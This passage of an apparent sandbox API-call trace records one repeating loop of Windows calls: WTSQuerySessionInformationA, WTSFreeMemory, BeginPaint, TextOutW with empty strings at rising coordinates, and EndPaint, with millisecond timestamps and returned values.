WTSFreeMemory (pMemory=0x0) [0037.543] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.543] TextOutW (hdc=0x0, x=3143, y=2950, lpString="", c=0) returned 1 [0037.543] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.543] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.544] WTSFreeMemory (pMemory=0x0) [0037.544] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.544] TextOutW (hdc=0x0, x=3153, y=2975, lpString="", c=0) returned 1 [0037.544] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.544] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.544] WTSFreeMemory (pMemory=0x0) [0037.544] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.544] TextOutW (hdc=0x0, x=3163, y=3000, lpString="", c=0) returned 1 [0037.544] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.544] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.544] WTSFreeMemory (pMemory=0x0) [0037.545] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.545] TextOutW (hdc=0x0, x=3173, y=3025, lpString="", c=0) returned 1 [0037.545] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.545] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.545] WTSFreeMemory (pMemory=0x0) [0037.545] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.545] TextOutW (hdc=0x0, x=3183, y=3050, lpString="", c=0) returned 1 [0037.545] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.545] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.546] WTSFreeMemory (pMemory=0x0) [0037.546] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.546] TextOutW (hdc=0x0, x=3193, y=3075, lpString="", c=0) returned 1 [0037.546] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.546] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.546] WTSFreeMemory (pMemory=0x0) [0037.546] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.546] TextOutW (hdc=0x0, x=3203, y=3100, lpString="", c=0) returned 1 [0037.546] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.546] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.546] WTSFreeMemory (pMemory=0x0) [0037.547] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.547] TextOutW (hdc=0x0, x=3213, y=3125, lpString="", c=0) returned 1 [0037.547] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.547] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.547] WTSFreeMemory (pMemory=0x0) [0037.547] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.547] TextOutW (hdc=0x0, x=3223, y=3150, lpString="", c=0) returned 1 [0037.547] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.547] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.547] WTSFreeMemory (pMemory=0x0) [0037.547] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.548] TextOutW (hdc=0x0, x=3233, y=3175, lpString="", c=0) returned 1 [0037.548] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.548] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.548] WTSFreeMemory (pMemory=0x0) [0037.548] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.548] TextOutW (hdc=0x0, x=3243, y=3200, lpString="", c=0) returned 1 [0037.548] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.548] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.548] WTSFreeMemory (pMemory=0x0) [0037.548] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.548] TextOutW (hdc=0x0, x=3253, y=3225, lpString="", c=0) returned 1 [0037.548] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.549] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.549] WTSFreeMemory (pMemory=0x0) [0037.549] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.549] TextOutW (hdc=0x0, x=3263, y=3250, lpString="", c=0) returned 1 [0037.549] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.549] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.549] WTSFreeMemory (pMemory=0x0) [0037.549] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.549] TextOutW (hdc=0x0, x=3273, y=3275, lpString="", c=0) returned 1 [0037.549] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.549] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.550] WTSFreeMemory (pMemory=0x0) [0037.550] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.550] TextOutW (hdc=0x0, x=3283, y=3300, lpString="", c=0) returned 1 [0037.550] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.550] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.550] WTSFreeMemory (pMemory=0x0) [0037.550] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.550] TextOutW (hdc=0x0, x=3293, y=3325, lpString="", c=0) returned 1 [0037.550] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.550] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.551] WTSFreeMemory (pMemory=0x0) [0037.551] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.551] TextOutW (hdc=0x0, x=3303, y=3350, lpString="", c=0) returned 1 [0037.551] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.551] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.551] WTSFreeMemory (pMemory=0x0) [0037.551] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.551] TextOutW (hdc=0x0, x=3313, y=3375, lpString="", c=0) returned 1 [0037.551] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.551] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.551] WTSFreeMemory (pMemory=0x0) [0037.552] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.552] TextOutW (hdc=0x0, x=3323, y=3400, lpString="", c=0) returned 1 [0037.552] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.552] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.552] WTSFreeMemory (pMemory=0x0) [0037.552] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.552] TextOutW (hdc=0x0, x=3333, y=3425, lpString="", c=0) returned 1 [0037.552] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.552] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.552] WTSFreeMemory (pMemory=0x0) [0037.552] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.552] TextOutW (hdc=0x0, x=3343, y=3450, lpString="", c=0) returned 1 [0037.553] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.553] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.553] WTSFreeMemory (pMemory=0x0) [0037.553] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.553] TextOutW (hdc=0x0, x=3353, y=3475, lpString="", c=0) returned 1 [0037.553] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.553] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.553] WTSFreeMemory (pMemory=0x0) [0037.553] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.553] TextOutW (hdc=0x0, x=3363, y=3500, lpString="", c=0) returned 1 [0037.553] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.553] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.554] WTSFreeMemory (pMemory=0x0) [0037.554] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.554] TextOutW (hdc=0x0, x=3373, y=3525, lpString="", c=0) returned 1 [0037.554] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.554] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.554] WTSFreeMemory (pMemory=0x0) [0037.554] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.554] TextOutW (hdc=0x0, x=3383, y=3550, lpString="", c=0) returned 1 [0037.554] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.554] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.555] WTSFreeMemory (pMemory=0x0) [0037.555] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.555] TextOutW (hdc=0x0, x=3393, y=3575, lpString="", c=0) returned 1 [0037.555] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.555] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.555] WTSFreeMemory (pMemory=0x0) [0037.555] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.555] TextOutW (hdc=0x0, x=3403, y=3600, lpString="", c=0) returned 1 [0037.555] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.555] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.556] WTSFreeMemory (pMemory=0x0) [0037.556] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.556] TextOutW (hdc=0x0, x=3413, y=3625, lpString="", c=0) returned 1 [0037.556] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.556] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.556] WTSFreeMemory (pMemory=0x0) [0037.556] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.556] TextOutW (hdc=0x0, x=3423, y=3650, lpString="", c=0) returned 1 [0037.556] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.556] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.556] WTSFreeMemory (pMemory=0x0) [0037.557] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.557] TextOutW (hdc=0x0, x=3433, y=3675, lpString="", c=0) returned 1 [0037.557] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.557] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.557] WTSFreeMemory (pMemory=0x0) [0037.557] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.557] TextOutW (hdc=0x0, x=3443, y=3700, lpString="", c=0) returned 1 [0037.557] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.557] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.557] WTSFreeMemory (pMemory=0x0) [0037.558] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.558] TextOutW (hdc=0x0, x=3453, y=3725, lpString="", c=0) returned 1 [0037.558] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.558] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.558] WTSFreeMemory (pMemory=0x0) [0037.558] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.558] TextOutW (hdc=0x0, x=3463, y=3750, lpString="", c=0) returned 1 [0037.558] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.558] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.558] WTSFreeMemory (pMemory=0x0) [0037.558] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.558] TextOutW (hdc=0x0, x=3473, y=3775, lpString="", c=0) returned 1 [0037.558] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.558] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.559] WTSFreeMemory (pMemory=0x0) [0037.559] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.559] TextOutW (hdc=0x0, x=3483, y=3800, lpString="", c=0) returned 1 [0037.559] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.559] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.559] WTSFreeMemory (pMemory=0x0) [0037.559] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.559] TextOutW (hdc=0x0, x=3493, y=3825, lpString="", c=0) returned 1 [0037.559] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.559] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.560] WTSFreeMemory (pMemory=0x0) [0037.560] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.560] TextOutW (hdc=0x0, x=3503, y=3850, lpString="", c=0) returned 1 [0037.560] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.560] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.560] WTSFreeMemory (pMemory=0x0) [0037.560] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.560] TextOutW (hdc=0x0, x=3513, y=3875, lpString="", c=0) returned 1 [0037.560] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.560] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.561] WTSFreeMemory (pMemory=0x0) [0037.561] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.561] TextOutW (hdc=0x0, x=3523, y=3900, lpString="", c=0) returned 1 [0037.561] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.561] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.561] WTSFreeMemory (pMemory=0x0) [0037.561] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.561] TextOutW (hdc=0x0, x=3533, y=3925, lpString="", c=0) returned 1 [0037.561] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.562] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.562] WTSFreeMemory (pMemory=0x0) [0037.562] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.562] TextOutW (hdc=0x0, x=3543, y=3950, lpString="", c=0) returned 1 [0037.562] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.562] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.562] WTSFreeMemory (pMemory=0x0) [0037.562] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.562] TextOutW (hdc=0x0, x=3553, y=3975, lpString="", c=0) returned 1 [0037.562] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.562] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.563] WTSFreeMemory (pMemory=0x0) [0037.563] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.563] TextOutW (hdc=0x0, x=3563, y=4000, lpString="", c=0) returned 1 [0037.563] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.563] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.563] WTSFreeMemory (pMemory=0x0) [0037.563] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.563] TextOutW (hdc=0x0, x=3573, y=4025, lpString="", c=0) returned 1 [0037.563] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.563] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.564] WTSFreeMemory (pMemory=0x0) [0037.564] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.564] TextOutW (hdc=0x0, x=3583, y=4050, lpString="", c=0) returned 1 [0037.564] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.564] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.564] WTSFreeMemory (pMemory=0x0) [0037.564] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.564] TextOutW (hdc=0x0, x=3593, y=4075, lpString="", c=0) returned 1 [0037.564] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.564] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.564] WTSFreeMemory (pMemory=0x0) [0037.565] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.565] TextOutW (hdc=0x0, x=3603, y=4100, lpString="", c=0) returned 1 [0037.565] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.565] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.565] WTSFreeMemory (pMemory=0x0) [0037.565] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.565] TextOutW (hdc=0x0, x=3613, y=4125, lpString="", c=0) returned 1 [0037.565] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.565] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.565] WTSFreeMemory (pMemory=0x0) [0037.565] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.565] TextOutW (hdc=0x0, x=3623, y=4150, lpString="", c=0) returned 1 [0037.565] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.566] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.566] WTSFreeMemory (pMemory=0x0) [0037.566] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.566] TextOutW (hdc=0x0, x=3633, y=4175, lpString="", c=0) returned 1 [0037.566] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.566] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.566] WTSFreeMemory (pMemory=0x0) [0037.566] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.566] TextOutW (hdc=0x0, x=3643, y=4200, lpString="", c=0) returned 1 [0037.566] EndPaint (hWnd=0x0, lpPaint=0x18a5ac) returned 0 [0037.566] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x7aa, WTSInfoClass=0x5, ppBuffer=0x18a520, pBytesReturned=0x18a518 | out: ppBuffer=0x18a520*=0x0, pBytesReturned=0x18a518) returned 0 [0037.567] WTSFreeMemory (pMemory=0x0) [0037.567] BeginPaint (in: hWnd=0x0, lpPaint=0x18a5ac | out: lpPaint=0x18a5ac) returned 0x0 [0037.567] TextOutW (hdc=0x0, x=3653, y=4225, lpString="", c=0) returned 1 [0037.567] EndPaint (hWnd=0x0, 